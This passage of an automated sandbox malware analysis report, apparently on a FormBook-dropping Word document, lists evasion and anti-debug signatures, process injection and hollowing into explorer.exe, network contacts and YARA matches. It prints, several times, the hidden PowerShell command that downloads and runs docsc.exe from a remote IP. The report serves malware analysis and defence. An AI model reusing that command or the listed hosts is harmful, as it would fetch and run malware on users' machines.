          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0000000A.00000002.2116660543.000000000238C000.00000004.00000001.sdmp, type: MEMORY
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Roaming\docsc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\docsc.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 000000000008897E second address: 0000000000088984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_004088B0 rdtsc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\docsc.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3036Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2832Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2448Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2992Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2416Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1664Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\docsc.exe TID: 2948Thread sleep time: -104068s >= -30000s
          Source: C:\Users\user\AppData\Roaming\docsc.exe TID: 2884Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\docsc.exe TID: 2236Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2796Thread sleep time: -35000s >= -30000s
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE TID: 2560Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\SysWOW64\NAPSTAT.EXELast function: Thread delayed
          Source: C:\Windows\SysWOW64\NAPSTAT.EXELast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\docsc.exeThread delayed: delay time: 104068
          Source: C:\Users\user\AppData\Roaming\docsc.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: powershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

          Anti Debugging:

          barindex
          Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)Show sources
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D1660 CheckRemoteDebuggerPresent,
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_004088B0 rdtsc
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020B26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\docsc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.foreverjsdesigns.com
          Source: C:\Windows\explorer.exeNetwork Connect: 202.210.8.86 80
          Source: C:\Windows\explorer.exeNetwork Connect: 44.230.85.241 80
          Source: C:\Windows\explorer.exeDomain query: www.southernbrushworks.com
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeNetwork Connect: 209.143.158.10 80
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.115.196 80
          Source: C:\Windows\explorer.exeDomain query: www.boostcoachingonline.com
          Source: C:\Windows\explorer.exeDomain query: www.applewholesales.com
          Source: C:\Windows\explorer.exeDomain query: www.thepocket-onlinelesson.xyz
          Source: C:\Windows\explorer.exeDomain query: www.ethereumdailypay.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.qqkit.net
          Source: C:\Windows\explorer.exeNetwork Connect: 107.155.89.74 80
          Source: C:\Windows\explorer.exeDomain query: www.betsysellsswfl.com
          Bypasses PowerShell execution policyShow sources
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\AppData\Roaming\docsc.exeMemory written: C:\Users\user\AppData\Roaming\docsc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Roaming\docsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\docsc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\docsc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\docsc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\docsc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Roaming\docsc.exeSection unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: AA0000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\docsc.exe 'C:\Users\user\AppData\Roaming\docsc.exe'
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\docsc.exe'
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXEQueries volume information: C:\Users\user\AppData\Local\Temp\OICE_A3A241B7-2F36-435D-B046-C9F74B3487D8.0\FLDA58.tmp VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Roaming\docsc.exeQueries volume information: C:\Users\user\AppData\Roaming\docsc.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\docsc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

